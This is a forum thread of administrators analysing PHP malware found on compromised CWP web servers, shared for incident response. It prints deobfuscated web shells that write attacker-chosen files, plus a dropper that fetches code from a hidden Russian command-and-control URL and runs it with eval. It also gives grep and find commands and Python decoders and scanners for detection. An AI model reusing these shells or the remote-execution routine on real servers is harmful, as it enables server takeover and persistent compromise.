Author Topic: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

Offline
*****
Those .c files don't appear to be IoC related to the patched CWP vulnerability. Likely they are part of another PHP injection attack -- multiple competing gangs are attempting to compromise servers on any given day. So the recommendation is to harden your PHP install right away, then engage in clean up & full postmortem.

Better to batten down the hatches rather than bailing water out of the ship...

Offline
*
True.
I always wanted to do my work just as a developer. I've always hated servers and networks. Now my days have begun!
I used to be a black hat in my stupid teen years. Now I have to pay for the karma :\

But you are right. There's an increase in attacks. This is getting ridiculous.

Offline
*
Those .c files don't appear to be IoC related to the patched CWP vulnerability. Likely they are part of another PHP injection attack -- multiple competing gangs are attempting to compromise servers on any given day. So the recommendation is to harden your PHP install right away, then engage in clean up & full postmortem.

Better to batten down the hatches rather than bailing water out of the ship...

.c files are the result of the same vulnerability, no doubt. Maybe no one noticed because the ".c" file is always hidden in a random directory, or maybe whoever used this vulnerability didn't drop a backdoor on your server. I switched to cPanel/WHM after removing all the backdoors.

Where did you find those files? Inside /home or anywhere else?

I also have this 198.144.182.13 IP in my logs.
I also found out that he has created WordPress accounts; this is his data:
user: wpadminerlzp
email: wpadmin@volovmart.ru
date: 2020-06-14 00:00:00 (by looking at this 00:00:00, I assume this was SQL inserted)

Those files were in the public_html folder (or the main folder of that website):
defauit.php
defauIt.php
licelic.c

This file was in the public_html folder in some cases, but in others it was in a random directory:
backup.c

This file was always hidden in some random directory:
.c (yes, just ".c")

And I suggest you check every file named "index.php", because they also add obfuscated PHP code to those. You can't miss it when you see it.

And they don't have to guess the CWP username to inject code, btw.

Offline
*
Yes, but having cPanel/WHM online is kind of expensive. I would rather configure a server myself.
The things you mostly do usually don't require a web panel.
Are you sure these .c files are from this attack or from another one? I searched and didn't find such malicious files.

Offline
*
What is the content of the .c file?

But yes, it is related to the attack too.
The file contains Base64-encoded code that makes many changes to PHP files related to WordPress themes and plugins.

Offline
*
I found some .c files.
I also found that there are a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deep inside some folders of websites I've developed myself. Thankfully I have a clean backup, and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it listed a lot of the infected website locations encoded in base64, plus some weird stuff (I can't decode it directly; maybe it is written with another encoding). I copy-pasted it to Cloud.ai, which decoded it for me and gave me all the URLs that are infected. I tried ChatGPT and it gave me nothing in return.
So "licelic.c" is of extreme importance for you to deobfuscate, to evaluate the URLs that are in there. This file exposes the folders that were exploited.

Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
"c" file (without the dot) is zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file called "s" that contains obfuscated PHP code which consists of drawing a form that probably interacts with the exploits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)
<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Access gate: only runs when the GET parameter "DEQ" is present
if(!isset($_GET["DEQ"])) exit;

// Builds a string by picking the characters of $TYCMzwTO at the
// comma-separated positions listed in $x6Mpbe (hides function names)
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
    $iGRCOPT = str_split($TYCMzwTO, 1);
    $emivt51O = explode(",", $x6Mpbe);
    $gMRtx3VD = "";
    foreach($emivt51O as $v) {
        $gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return $gMRtx3VD;
}

// Any static call on this class fills three globals with decoded names.
// Working the indices through Za64HUq_(): $puTfPFm = "fopen",
// $CULPcX = "fwrite", $mWHO_PtG = "fclose".
// The excerpt as posted never makes that static call and never uses
// $CULPcX, so part of the original file was probably not reproduced.
class hCXKOZB {
    public static function __callStatic($name, $arguments) {
        $temarr = array(
            "puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
            "CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
            "mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
        );
        foreach($temarr as $key => $v) {
            $GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// POST fields: WOjVxhQ_ = target file name, ZXk7oVxn = file content
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// If content was posted, open the named file for writing ($puTfPFm = fopen)
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";

// Close the handle ($mWHO_PtG = fclose) and exit with a fixed marker string
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));

// Otherwise render the drop form: file name field plus content textarea
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>

index.php
This is the index.php deep inside subfolders where the index file I created was. The root index.php file was replaced by malicious code that executes the payload and then imports my original index file.
So take a deep look at every index file you have (even in sub-folders).

These files were touched (date-time changed). Mine were dated 30/08/2024 23:06:51

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going through all files and folders and applying new rules to stop execution in folders that don't have PHP files (image uploads, for example).
« Last Edit: October 13, 2025, 07:23:48 PM by pedromidiasf »

Offline
*
backup.c
Zip file (change the extension to zip and open it with a zip application). It contains a new file called "back".
This file talks to the outside. I asked Cloud.ai to comment the code:
(DO NOT EXECUTE)
<?php
// MALICIOUS CODE - DO NOT EXECUTE

// Helper that calls a function by name; hides calls such as
// function_exists() and file_get_contents() from simple text searches
function sdcss($strrt,$pram_1){
    return $strrt($pram_1);
}

// Fetches remote PHP code and executes it
// Parameters: $url = remote server URL, $time_out = unused
function KmY7I3NC($url,$time_out=30){
    // Prefer cURL when the extension is loaded
    if(sdcss("function_exists","curl_exec")){
        $fq8h2HYxV=curl_init();

        // Target URL (10002 = CURLOPT_URL)
        curl_setopt($fq8h2HYxV,10002,$url);

        // Return the body as a string (19913 = CURLOPT_RETURNTRANSFER)
        curl_setopt($fq8h2HYxV,19913,1);

        // Skip TLS certificate verification (64 = CURLOPT_SSL_VERIFYPEER)
        curl_setopt($fq8h2HYxV,64,false);

        // Random timeout of 30-60 seconds (13 = CURLOPT_TIMEOUT)
        curl_setopt($fq8h2HYxV,13,mt_rand(30,60));

        // Fetch the response, drop its first character, base64-decode the
        // rest and run it as PHP. The mixed-case "evAl" dodges case-sensitive greps.
        $fhD2dN4z = evAl(base64_decode(substr(trim(curl_exec($fq8h2HYxV)),1)));

        curl_close($fq8h2HYxV);
    }else{
        // Fallback without cURL: same decode-and-eval via file_get_contents()
        $fhD2dN4z = evAl(base64_decode(substr(trim(sdcss("file_get_contents",$url)),1)));
    }

    // Return whatever the executed code returned
    return $fhD2dN4z;
}

// Trigger: GET parameter "l" must be present
if(isset($_GET["l"])){
    // Collect the other GET parameters (empty string when absent);
    // they are relayed to the remote server unchanged
    $tid = isset($_GET["tid"])?$_GET["tid"]:"";
    $did = isset($_GET["did"])?$_GET["did"]:"";
    $tem = isset($_GET["tem"])?$_GET["tem"]:"";
    $ck = isset($_GET["ck"])?$_GET["ck"]:"";
    $usip = isset($_GET["usip"])?$_GET["usip"]:"";
    $vson = isset($_GET["vson"])?$_GET["vson"]:"";
    $no = isset($_GET["no"])?$_GET["no"]:"";

    // C2 URL built from octal/hex escapes so the host name is not visible as plain text.
    // The escapes decode to "htTp://vOlOVmART.Ru/dai/?c=base&l=", followed by
    // &ck=...&usip=...&vson=...&no=...&tid=...&did=...&tem=...
    $url = "\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d".$_GET["l"]."&ck=".$ck."&usip=".$usip."&vson=".$vson."&no=".$no."&tid=".$tid."&did=".$did."&tem=".$tem;

    // Fetch, decode and execute whatever the remote server returns
    $str = KmY7I3NC($url);
}

?>

Russian URLs (I've also detected some Russian emails on my WordPress accounts).
But it looks like the domain is down. Probably banned?
« Last Edit: October 13, 2025, 07:09:59 PM by pedromidiasf »
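The escaped string and the bare numbers in the curl_setopt() calls above are the two things worth pulling out of a dropper like backup.c before anything else. The helper below is an added example, not code from this thread or from the malware: it decodes PHP double-quoted escapes (\ooo, \xHH and the simple ones) the way PHP would, and labels the numeric curl_setopt() codes with the CURLOPT_* constant they stand for (the table is a hand-picked subset of PHP's constants; extend it as needed). The sample input is the URL prefix and the four curl_setopt() lines copied from the posted code.

```python
"""Decode the escaped C2 URL and the numeric curl_setopt() codes from a backup.c-style dropper."""
import re

# libcurl option numbers as PHP's CURLOPT_* constants expose them (subset, assumed enough here)
CURLOPT_NAMES = {
    10002: "CURLOPT_URL",
    19913: "CURLOPT_RETURNTRANSFER",
    64: "CURLOPT_SSL_VERIFYPEER",
    81: "CURLOPT_SSL_VERIFYHOST",
    13: "CURLOPT_TIMEOUT",
    52: "CURLOPT_FOLLOWLOCATION",
    10018: "CURLOPT_USERAGENT",
    47: "CURLOPT_POST",
    10015: "CURLOPT_POSTFIELDS",
}

# PHP double-quoted escapes: \xHH, \ooo (1-3 octal digits), and \n \t \r \\ \" \$
PHP_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)', re.S)
SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "$": "$"}


def php_unescape(literal: str) -> str:
    """Return the string PHP builds from the body of a double-quoted literal."""
    def one(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        # PHP keeps unknown escapes as-is, backslash included
        return SIMPLE.get(m.group(3), "\\" + m.group(3))
    return PHP_ESCAPE.sub(one, literal)


def decoded_string_literals(php_source: str) -> list:
    """Every double-quoted literal in the source, unescaped, so hidden host names show up."""
    return [php_unescape(m.group(1))
            for m in re.finditer(r'"((?:[^"\\]|\\.)*)"', php_source, re.S)]


def curl_options(php_source: str) -> list:
    """(code, name) for every curl_setopt($handle, <number>, ...) call in source order."""
    codes = re.findall(r'curl_setopt\(\s*\$\w+\s*,\s*(\d+)\s*,', php_source)
    return [(int(c), CURLOPT_NAMES.get(int(c), "unknown")) for c in codes]


# Sample input: the URL prefix and the curl calls copied from the posted backup.c
ESCAPED_URL = (r"\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124"
               r"\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d")
BACKUP_C_SNIPPET = r'''
curl_setopt($fq8h2HYxV,10002,$url);
curl_setopt($fq8h2HYxV,19913,1);
curl_setopt($fq8h2HYxV,64,false);
curl_setopt($fq8h2HYxV,13,mt_rand(30,60));
$url = "''' + ESCAPED_URL + r'''".$_GET["l"];
'''

if __name__ == "__main__":
    print(php_unescape(ESCAPED_URL))
    for code, name in curl_options(BACKUP_C_SNIPPET):
        print(code, name)
    print(decoded_string_literals(BACKUP_C_SNIPPET))
```

Run decoded_string_literals() over every suspect PHP file rather than grepping for a host name: the same gang can re-encode the string differently in each drop, but the decoded value is what you block at the egress firewall and search for in outbound proxy logs.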

Offline
*
wp-login.php
It receives a URL GET parameter (?MeL=...) that is related to the "licelic.c" code (all the URLs in there have this MeL parameter). It also saves files.

(DO NOT EXECUTE THIS!)
<?php
// WARNING: MALICIOUS CODE - DO NOT EXECUTE

// Initialize variables
$aLTZ_CWiB = false;

// Decoy call: the index-picked characters spell "strstr" (s-t-r-s-t-r),
// so this is strstr("dseBk", "GjGg9m"); the result is never used
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].
("vgIrrw")[3])("dseBk", "GjGg9m");

$b4YsfJ = array("o0FgLZyK4ABbJHto");
$JHwES = (string) null;

// Decoy call: spells "wordwrap"; wordwrap("", 15) does nothing useful
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].
("wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])("", 15);

// Get current date and time (unused)
$EKsO2FVW = date("Y-m-d H:i:s");

// Another "strstr" decoy (same character picks as above)
$MAsW_z = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
("nntWNs")[2].("vgIrrw")[3])("MAsW_z", "cGXdJI");

// Spells "trim"; trim("   ") is another no-op
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");

// Access gate: only runs when the GET parameter "MeL" is present
if(!isset($_GET["MeL"])) exit;

// Check if constant is defined (padding)
$LHpbN4P2x = defined("_NYaHD");

// POST parameter "RfDJgIyWki" = target file name, passed through the same "trim" trick
$NiXTY2V3mC = isset($_POST["RfDJgIyWki"])?
(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["RfDJgIyWki"]):"";

$_blZ7fx = metaphone("moSCud");
$Jt69Gsohg = define("OL0mQ","gDrORyX");
$BMbxgE4 = false;

// POST parameter "xYjdx" = file content, trimmed
$V9Aqud = isset($_POST["xYjdx"])?
(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["xYjdx"]):"";

// If content was posted, write it to the named file via save_file()
// and exit, printing a fixed marker string
$sf = !empty($V9Aqud)?exit("hHc1Pq7UymG5xrZgRn_".save_file($NiXTY2V3mC,$V9Aqud)):"";

// One more "strstr" decoy
$dPE1i_ = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
("nntWNs")[2].("vgIrrw")[3])("zOEPQxj","ssMKu");

// CRITICAL FUNCTION: writes attacker-supplied content to an attacker-chosen path
// (declared after its use; PHP hoists unconditional top-level function declarations)
function save_file($NiXTY2V3mC,$V9Aqud){
    // Open the file in write mode, truncating anything already there
    $handle = fopen($NiXTY2V3mC,"w");
    if($handle){
        fwrite($handle,$V9Aqud);
        fclose($handle);
    }
    return "hHc1Pq7UymG5xrZgRn_";
}

$yXQwOmu = addslashes("yXQwOmu");

// Display the drop form, reconstructed from character indices
// (the rest of this echo was elided in the post)
echo ("<z01")[0].("em8fuW")[3].(... [reconstructs HTML form HTML] ...);
?>
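Both droppers shown in this thread, the "s" file from the "c" zip and this wp-login.php, hide their real function names behind the same idea: keep an alphabet string and pick characters out of it by index, either with a (string, "i,j,k") table fed to a helper like Za64HUq_() or with an inline ("IsSw6u")[1].("ptB7")[1]... chain. The script below is an added example, not code from the thread or from the malware: it recovers the names statically from the source text, without running any of it. It assumes the two shapes seen in the posted files ("name" => array("alphabet", "indices") entries and ("...")[n] terms joined by "."); the two excerpts are copied from the posted code as sample input.

```python
"""Recover the function names hidden by index-picked characters in PHP droppers."""
import re


def pick_chars(alphabet: str, indices: str) -> str:
    """Same operation as the posted Za64HUq_(): characters of `alphabet`
    at the comma-separated positions listed in `indices`."""
    return "".join(alphabet[int(i)] for i in indices.split(","))


# "name" => array("alphabet", "i,j,k") entries, as in the "s" file's __callStatic table
INDEX_TABLE_RE = re.compile(r'"(\w+)"\s*=>\s*array\(\s*"([^"]*)"\s*,\s*"([\d,]+)"\s*\)')


def decode_index_tables(php_source: str) -> dict:
    """Map each global the table sets to the function name it decodes to."""
    return {name: pick_chars(alphabet, idx)
            for name, alphabet, idx in INDEX_TABLE_RE.findall(php_source)}


# ("IsSw6u")[1].("ptB7")[1]... chains, as in the posted wp-login.php (may span lines)
TERM_RE = re.compile(r'\(\s*"([^"]*)"\s*\)\s*\[(\d+)\]')
CHAIN_RE = re.compile(r'(?:\(\s*"[^"]*"\s*\)\s*\[\d+\]\s*(?:\.\s*)?)+')


def decode_char_chains(php_source: str) -> list:
    """The string each run of ("...")[n] terms spells, in source order."""
    names = []
    for run in CHAIN_RE.finditer(php_source):
        terms = TERM_RE.findall(run.group(0))
        names.append("".join(s[int(i)] for s, i in terms))
    return names


# Sample input: excerpts copied from the two posted files
S_FILE_EXCERPT = r'''
$temarr = array(
    "puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
    "CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
    "mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
);
'''
WP_LOGIN_EXCERPT = r'''
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].
("vgIrrw")[3])("dseBk", "GjGg9m");
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].
("wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])("", 15);
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");
'''

if __name__ == "__main__":
    print(decode_index_tables(S_FILE_EXCERPT))   # which globals become fopen / fwrite / fclose
    print(decode_char_chains(WP_LOGIN_EXCERPT))  # what each decoy call really is
```

The output is what decides the triage: the "s" file's table resolves to fopen/fwrite/fclose, which makes it a file dropper regardless of how the form looks, and the wp-login.php chains resolve to strstr/wordwrap/trim, which are padding. Neither file contains the literal string "eval", so a grep for that alone would have missed both.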

Offline
*
I also found out that all the files the server distributes are obfuscated differently, so you won't be able to search for specific text. Maybe specific functions, but even then: functions like "goto" and "ucwords", and $GLOBALS, which are not commonly used, are used a lot in these exploits.

The $GLOBALS array is used to add a function (built from a string??) to the system that is afterwards executed. This allows the attacker to execute PHP code without using the "eval" function (I'm not sure about this part). This term is used in all the files I saw; it might be very useful for finding these exploits.


Another idea:
Also search for files that start with "PK" (zipped content) and don't have the zip extension.
« Last Edit: October 13, 2025, 09:18:27 PM by pedromidiasf »

Offline
*
There are a lot of exploited index.php files. Some are close to the "c" file, others are just scattered across directories.
Use this to find them:
grep -Rl --include="*index.php" 'ucwords' /home/px_disabled/public_html/


To find zipped files that have no zip extension (ignoring Microsoft Office documents):
find /home -type f ! -name '*.zip' ! -name '*.docx' ! -name '*.xlsx' ! -name '*.pptx' -exec sh -c '[ "$(head -c2 "$1")" = "PK" ] && echo "$1"' _ {} \;
« Last Edit: October 13, 2025, 11:12:53 PM by pedromidiasf »
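The grep and find one-liners above cover one indicator each. The scanner below is an added example, not code from the thread: it walks a tree once and reports, per file, every indicator this thread describes: zip magic behind a non-archive name (the "c", ".c", backup.c and licelic.c cases), the dropped file names including the defauIt.php lookalikes, PHP files carrying the obfuscation tokens the posters noticed (ucwords, goto, $GLOBALS[ and the usual decode-and-eval pair), and PHP files modified after a cutoff such as the date of your last clean backup. The token list, the extension sets and the name pattern are assumptions to tune for your own hosts, and the sample tree is constructed in a temporary directory, not taken from a real compromise.

```python
"""Triage scan for the artefacts described in this thread."""
import os
import re
import tempfile
import time

ARCHIVE_EXT = {".zip", ".docx", ".xlsx", ".pptx", ".jar", ".odt", ".ods",
               ".odp", ".epub", ".apk", ".xpi", ".war"}
ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")
# Tokens reported in the thread plus the usual decode/eval pair (assumed list; tune it)
PHP_TOKENS = (b"ucwords", b"goto ", b"$GLOBALS[", b"__callStatic",
              b"base64_decode(", b"eval(", b"evAl(", b"str_split(")
# Dropped names: c, .c, *.c (licelic.c, backup.c) and the default.php lookalikes
DROPPED_NAME = re.compile(r"^(c|\.c|.*\.c|defau[^l]t\.php)$", re.IGNORECASE)
PHP_EXT = {".php", ".phtml", ".php5", ".php7", ".inc"}


def zip_without_archive_name(path: str) -> bool:
    """True when the file starts with zip magic but is not named like an archive."""
    if os.path.splitext(path)[1].lower() in ARCHIVE_EXT:
        return False
    with open(path, "rb") as fh:
        return fh.read(4) in ZIP_MAGIC


def php_token_hits(path: str) -> list:
    """Which obfuscation tokens occur in the first MiB of the file."""
    with open(path, "rb") as fh:
        data = fh.read(1 << 20)
    return [t.decode() for t in PHP_TOKENS if t in data]


def scan_tree(root: str, min_hits: int = 2, since: float = 0.0) -> dict:
    """Return {relative_path: [reasons]} for every file worth a look."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            reasons = []
            if DROPPED_NAME.match(name):
                reasons.append("dropped-name")
            if zip_without_archive_name(path):
                reasons.append("zip-magic-no-archive-ext")
            if os.path.splitext(name)[1].lower() in PHP_EXT:
                hits = php_token_hits(path)
                # index.php / wp-login.php were the files the attacker replaced,
                # so a single token is enough to flag those
                threshold = 1 if name in ("index.php", "wp-login.php") else min_hits
                if len(hits) >= threshold:
                    reasons.append("php-tokens:" + ",".join(hits))
                if since and os.stat(path).st_mtime >= since:
                    reasons.append("php-modified-after-cutoff")
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_tree(root: str) -> None:
    """Constructed sample files (not real captures) mirroring the thread's findings."""
    files = {
        "public_html/c": b"PK\x03\x04" + b"\0" * 32,            # zip payload named "c"
        "public_html/report.zip": b"PK\x03\x04" + b"\0" * 32,   # archive with a proper name
        "public_html/defauIt.php": b"<?php echo 1;",             # lookalike name
        "public_html/a/b/index.php": b"<?php $GLOBALS['k']=ucwords('x'); goto a;",
        "public_html/ok/index.php": b"<?php require 'app.php';",  # clean and old
        "public_html/inc/lib.php": b"<?php return base64_decode($x);",  # one token: below threshold
    }
    for rel, data in files.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)


def demo() -> dict:
    """Scan the sample tree with a cutoff of 30 days ago; the clean index.php is aged 400 days."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        old = time.time() - 400 * 86400
        os.utime(os.path.join(root, "public_html/ok/index.php"), (old, old))
        return scan_tree(root, since=time.time() - 30 * 86400)


if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(rel, reasons)
```

Run it as the account owner or root against /home with since set to the timestamp of your clean backup, and review every hit by hand: the mtime reason on its own only says "changed since the backup", which is exactly the list you need when the plan is to restore from backup and re-check what the attacker touched afterwards.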